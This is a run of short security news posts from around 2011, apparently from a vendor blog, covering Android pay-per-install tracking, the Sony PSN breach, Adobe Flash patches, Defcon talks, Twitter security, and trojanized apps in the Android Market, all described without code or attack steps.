A relatively new development in app advertising has a concerning feature. It leeches much of the same information that many Android Trojans also steal. Through an app promotion campaign, a new feature called “offerwalls” are used by Pay Per Install (PPI) services to promise further adoption and revenue for app developers. But what is the real danger? It is found in the way these services uniquely identify users and the information they collect.

What is Pay Per Install?

Pay Per install within the Android App world, is a service offered by specialized advertisers to app developers with the intention of further exposing their apps to a larger audience. Many services exist, such as Tapjoy and Everbadge, which, in the latter case, promises to increase app revenue by “50-400%”. These sites use a particular method of tracking users. App developers need to enable this tracking somehow. In most cases, an SDK (software development kit) must be installed. Tracking code is added to the developer’s application, and that code is supplied by the PPI site.

Sony has reported that it has had a number of sign-in attempts on accounts belonging to users on its various networks. In a statement on the Sony site it was revealed that “Sony Network Entertainment International LLC and Sony Online Entertainment (SOE) have detected a large amount of unauthorized sign-in attempts on PlayStation®Network (PSN), Sony Entertainment Network (SEN) and Sony Online Entertainment (SOE) services.”

Adobe pushed an emergency update to its ubiquitous Flash player yesterday that closed holes on 6 separate vulnerabilities. Of the 6, 4 were related directly to code execution (CVE-2011-2426, CVE-2011-2427, CVE-2011- 2428, CVE-2011-2430) One revolves around a universal cross-site scripting issue (CVE-2011-2444), and the last vulnerability can lead to information disclosure (CVE-2011-2429).

We recommend that you update all systems immediately. Adobe also states that CVE-2011-2444 relating to cross-site scripting, has reportedly been seen in the wild. The update is available here: UPDATE

When logging into Facebook today, I was greeted with a new set of controls. In the wake of the apparent success of Google+, it seems that Facebook would like to reassure their user base that they too can control who sees what you post, and who you tag. You can now easily tag who you’re with, where you are, and most importantly; who can see your posts.

I'm here at Defcon watching the hacker masses share their information. As usual, it's incredibly crowded, but the new venue at the Rio hotel is a welcome upgrade. Las Vegas is as hot and crazy as ever. It's never a boring visit.

So far there have been some great talks, and I'd like to highlight a few favorites.

The talk by Moxie Marlinspike; "SSL and the Future of Authenticity" covering the shortcomings of the Certificate Authority system, was an eye-opening look into how broken this system is. As always, Moxie is an engaging and relevant speaker, and his solution is based around a distributed system with multiple authorities verifying the site you're connecting to. With a few kinks still to work out, it's an interesting idea, and certainly it's time to move away from the current model.

Another talk, by Daniel Garcia, called "UPnP Mapping" demonstrated an issue quite widespread on the internet. UPnP (Universal Plug and Play) is a interoperability system developed by Microsoft, with the idea that devices could added to a network with zero setup. It's never worked very well at best, and at worst, it can provide a remote party all sorts of information about your device from the Internet. Mr. Garcia demonstrated a tool where he was able to scan a network block, create a list of vulnerable routers, and then even issue commands. In some cases these routers could be used as an open proxy, or many other more malicious purposes.

Today is May 17, almost exactly a month after the massive breach of Sony’s PSN network. If you live in North America then you may be pleased to know that the Playstation network has finally come back online. Due to the enormous amount of subscribers to the service, the restart has been a bit shaky, with reports of password reset emails clogging ISP mail servers. Despite the hiccups, it seems that the service is gradually returning.

If you are a customer of the Sony service, you will need to immediately change your password as well as install a firmware update to your system. Sony has pledged a much stronger security environment to its customers and partners, and this appears to be the beginning of many changes. Sony has previously stated that they have rebuilt the entire network from scratch and moved their PSN infrastructure to a new data center in an undisclosed location. I’m not sure why this emphasis on security wasn’t a focus of the original model, but maybe Sony can prevent future mishaps. Perhaps all the additional outside scrutiny will help, but only time will tell.

After a long service black out Sony reported yesterday that their PSN gamer network has been compromised. Sony further admitted that all kinds of user data had become available to an unknown attacker.  Some of the personal details available to the attackers include your name, address, and email address, date of birth, PSN login name and password.  In fact even password security answers may have been obtained.  In addition to these items Sony stated “While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility."  Sony does not speculate on when their network may come back online but states that they are rebuilding it, and undergoing external security audits.

Twitter is celebrating its 5th birthday this week. Since its inception in July of 2006 Twitter has grown to become an essential part of many people’s daily lives in just 140 characters. Twitter has also spawned multiple malware campaigns and continues to be a successful avenue of attack to this day.

Security on Twitter has had an eventful history, even considering its relatively young age. There have been all sorts of different types of attacks from trending topics to hacked admins, to account hijacks, just to name a few. In fact, due to Twitter’s popularity and its constant security lapses, the Federal Trade Commission actually brought charges against Twitter in 2010. As a result Twitter had to adopt a number of new security policies, and includes such security options as default SSL connectivity and OAUTH support for external Twitter clients.

A new blog update from Google promises a response to deal with the outbreak of the so called “DroidDream” malware that went live on the Android Market last week:

Malware in the Android Market Part 1

Malware in the Android Market Part 2

According to the blog, Google will initiate its remote-removal process by pushing the installation of a new app called “Android Market Security Tool March 2011.” We’ve had a look at this app, and it does not fix the vulnerability, it simply removes the applications known to be malicious. Google further promises changes to the market to deal with this type of issue and claims to be “working with our partners to provide the fix for the underlying security issues.”

Every day, we see more reports about malware in the Android Market. This time three developers known as MYOURNET, Kingmall2010, and we20090202, possibly the same person, were offering a number of Android apps for free download.

Many, if not all of the apps, were trojanized copies of legitimate apps from other developers.

I downloaded one app in particular called Super Guitar Solo. Upon reviewing the app, I found it contains the popular “rage against the cage” root exploit commonly used to “root” Android phones and gain superuser privileges. As any Linux guru will tell you, once you have superuser rights, you have full, administrator level access to the phone’s operating system. In this case the exploit is launched without the owner’s consent.

So what is the purpose of this Trojan? The application will attempt to gather product ID, device type, language, country, and userID among other things, and then upload them to a remote server. Unlike most of the other samples seen so far, there is no attempt at sending or receiving premium rate SMS messages.

This discovery is important because up until now most of the Android malware has been found outside of the Android Market, which requires a number of special steps to be taken in order to infect the phones. In this case, users are even able to install from the web with the new Android Market format. We have previously talked about this here: The Dark Side of the new Android Market

It's also interesting to point out that, just as our researchers predicted last year, the cybercriminals have started taking advantage of jailbreaking tools as mentioned here: The Dangers of Jailbreaking

One of the important observations here is that it is likely that these are not the only live malware in the Android Market. Kaspersky recommends that you always check all the permission requests that an application is requesting at install time. This also highlights the dangers of jailbreaking or rooting your devices. This particular root exploit has been detected by Kaspersky as Exploit.AndroidOS.Lotoor.g and Exploit.AndroidOS.Lotoor.j since February 1st, so if you are a Kaspersky Mobile Security user, you are already protected.

Kaspersky will continue to examine this sample and update with any future information.

UPDATE: Google has now removed the malicious apps and the corresponding download page from the Android Market.